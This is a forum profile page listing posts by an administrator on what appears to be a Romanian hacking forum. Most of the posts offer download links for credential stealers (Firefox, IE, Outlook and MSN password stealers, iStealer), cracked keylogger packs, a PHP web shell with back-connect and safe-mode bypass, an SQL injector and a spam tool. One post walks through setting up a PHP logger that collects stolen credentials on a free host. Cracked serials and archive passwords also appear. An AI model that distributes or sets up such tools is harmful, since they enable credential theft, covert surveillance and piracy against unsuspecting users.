Jump to content

Nytro

Administrators
  • Posts

    18790
  • Joined

  • Last visited

  • Days Won

    739

Everything posted by Nytro

  1. Nytro

    nytro

    Done, closed.
  2. Simple Firefox Stealer Stub Size: 26kb's Logs preview: ===================================== ========== Firefox Stealer ========== ===== HackHound.Org - Visit Us! ===== ===================================== -------------------- https://ssl.rapidshare.com test001 test -------------------- ===================================== ======== c0ded By |x Seabra x|======= ===================================== Download ( Binary + Source code ): http://www.2shared.com/file/6972008/79c5c77c/FF_Stealer__SRC.html
  3. Download: http://www.2shared.com/file/6971993/22b131dc/LabStealer.html
  4. It retrieves: - Outlook - Firefox - IE >= 7 - MSN Download: http://www.2shared.com/file/6971977/bb5fd84b/PS_online.html
  5. Password: ghanshyam_thori
  6. Error based MSSQL Injector. Written in VB. Download: http://www.2shared.com/file/6971911/466daf8/dbex.html
  7. Sureshot Ghost Keylogger v.3.80 Quick Keylogger 2.1.027 Embrace Family Key Logger Easy Keyboard Logger v.1.0 Blazingtools Perfect Keylogger v.1.6.2.0 Ardamax Keylogger v.1.9 All with cracks Download: http://rapidshare.com/files/1910024/Key_Logger_Collection.rar Password: ghanshyam_thori
  8. Download: http://roooga.googlepages.com/EgySpyv1.13.rar
  9. Download: http://rapidshare.com/files/93069143/VicSpy2008_upped_by_AKEXOR_.rar Password: crazy-coderz.net
  10. Download: http://rapidshare.com/files/258046819/Vaqxination_v2.3_Public.rar Antidote: http://rapidshare.com/files/258074253/Cure.rar
  11. SERIAL: NAME: Kimberley Ronald SERIAL: RGA3Y3A-M3D88-T3HU5-T28TM-G47AS-SFTD7-624JC Download: http://www.megaupload.com/?d=ELSITFN7
  12. [+] Authorization [+] Server Information [+] File manager (copy, rename, move, delete, chmod, touch, creating files and folders) [+] View, hexview, edit, download, upload files [+] Console [+] SQL manager (MySQL, PostgreSQL) [+] Implementation of PHP code [+] Safe mode bypass [+] Work with strings + Search hashes in online databases [+] Bruteforce (FTP, MySql, PostgreSQL) [+] Bindports & back-connects (C / Perl) [+] Autoremove [+] AJAX (can turn off) [+] many other Download: http://www.sendspace.com/file/aefy4n
  13. Downloader? Hmm, nu stiu ce sa zic. Eu unul nu stau sa verific daca e infectat. Iti asumi riscurile daca vrei sa il incerci.
  14. Download: http://rapidshare.com/files/113971760/Remote.Password.Stealer.v2.7.Retail-ZWT.rar
  15. Download: http://www.2shared.com/file/6955683/c5548397/Midnight_Stealer_15.html
  16. Download: http://www.2shared.com/file/6955660/c2deffa3/HH_STEALER_v13.html
  17. Download v3.0: http://www.mediafire.com/?ruiw5yummdd Download v4.0: http://www.mediafire.com/download.php?zwzjyzyjine
  18. Download: http://www.2shared.com/file/5201353/6a9ccd48/SedurnasS_StealerS_Pack.html Mirror: http://www.file-upload.net/download-1555872/Sedurnas--S-Stealer--S-Pack.rar.html
  19. Download Ardamax Keylogger 3.0 + Serial + Videotutorial Download: http://www.megaupload.com/?d=RLQU8FRX Password: Securityspl0its
  20. Nu e problema mea, nu folosesc asa ceva
  21. ~ List spamming ~ external SMTP ~ progressbar In a new version i will include an internal STMP so you can spam better and without a llimit =) . It´s a SPAMMER and NOT a BOMBER Download: http://ul.to/wekimy
  22. Got a hash? Will chase it for online services? Now it has become much easier! Download ArxFuckingHash, enter hash (md5, Mysql, Sha1) and run the program itself will take place on the list of public services and make the parsing, then you display the result in a convenient form. Advantages: - Work in 10 streams (10 to check services at once). - Search for md5, sha1, mysql. - Ability to edit the configuration of servers (servers.ini), ie you can compile your own list. - The program has a convenient, attractive interface. - Search multiple hash (adding to the list). - Create a md5 string, or file. - Built-checker working and not working services / settings. - Ability to edit mode, online services, see web page at once, and the source code. - Also in the folder, help, help file is for editing the parameters of service. Supported types of hash: - Md5 - Sha-1 - MySQL Updates Second Edition: - Added 3 new MD5 service, now 28! - Now you can create not only the MD5 hash, and SHA1, CRC - A new system for determining the type of hash - Now the program is not only in Russian but in English - Transfer the program to be in a separate file, which makes it possible to translate the program into any language - Fixed a couple of mistakes In the folder is a file 'english.txt', to translate to English language, just rename the file 'english.txt' on 'active.txt'. Download: http://depositfiles.com/files/9gx0vr7zk http://rghost.ru/363643
  23. Mendacious: The wait is over, 3.0, 4.0 and now 5.0! The widely anticipated iStealer 5.0 has been released. This version of iStealer does NOT use FTP instead it uses PHP logging. I've decided to release it because it is no longer FUD - about 50% detectable. I've analyzed it and have ran it on a virtual machine and checked connections, all clean. iStealer v6.0 is coming soon. You will probably be impressed. Now lets set-up iStealer! Step 1: Register at http://www.blackapplehost.com/register.jsp Step 2: Go to UserCP. Click "Create/delete MySQL database" Name the database what you want, it will include your username. In this example my username will be "example". I have named my database "example_db" Press "Create Database" Now for the user, I have named mine "example_user" Password can be anything, mine will be "passw0rd" Press "Create User" For Assign Priviledges, make sure the user and database are selected on the list. When all boxes are ticked, press "Assign Priviledges" Step 3: Download iStealer v5.0 (MOD) Backdoored Step 4: Open \iStealer5.1\PHP Logger\index.php and edit the configuration information. All of the information is commented at the side, it's clear what it is. Leave localhost. Step 5: At BAH, go to "File manager" in the User CP and upload index.php & style.css After this, your iStealer is set up, http://username.blackapplehost.com/index.php Log in there to view your logs. Simple enough. Step 6: Open iStealer 5.0.1 and fill in all of the necessary information. The "Url" will be http://username.blackapplehost.com/index.php Finished! (Total Credits to: Vaqxine and V3n0m_x for the tutorial)
  24. Source ( Perl ): http://guidjos.justfree.com/plc.txt Usage: plc.pl proxylistfilename.txt Mini proxy list for testing: 174.143.236.197:80 64.76.22.107:8080 190.139.107.68:8080 200.127.215.78:80 200.45.199.129:3128 203.30.254.117:8080 202.131.94.58:808 134.184.84.204:80 189.109.46.210:3128 200.129.25.3:8080 201.54.235.115:3128 200.148.230.217:3128 189.56.61.33:3128 200.139.78.209:3128 189.80.232.1:3128
  25. O noua bresa in securitatea Mac OSX de Mina Hutterer | 31 iulie 2009 Un analist in domeniul securitatii software a descoperit o noua mare "gaura" in securitatea sistemului de operare Mac OS X. Noua tehnica le permite hackerilor sa preia controlul asupra computerelor cu OS X si sa fure date care se presupune ca sunt encrypted. Tot ceea ce trebuie facut este sa se obtina accesul la memorie. Cu doar cateva linii de cod, atacatorul poate obtine acces la memoria root, pe care apoi o "completeaza" pentru a realiza o conexiune TCP prin care hackerul apoi poate descarca malware si controla computerul de la distanta. Analistul Dino Zovi a demonstrat cum atacul poate fi folosit pentru a prelua controlul asupra browser-ului Safari si pentru a fura date si informatii despre contul bancar al utilizatorului. "Mac-urile nu sunt protejate de vreun praf magic. Sa scrii exploit-uri pentru Vista cere munca. Sa scrii exploit-uri pentru Mac este foarte fun." Sursa: Daily Tech
×
×
  • Create New...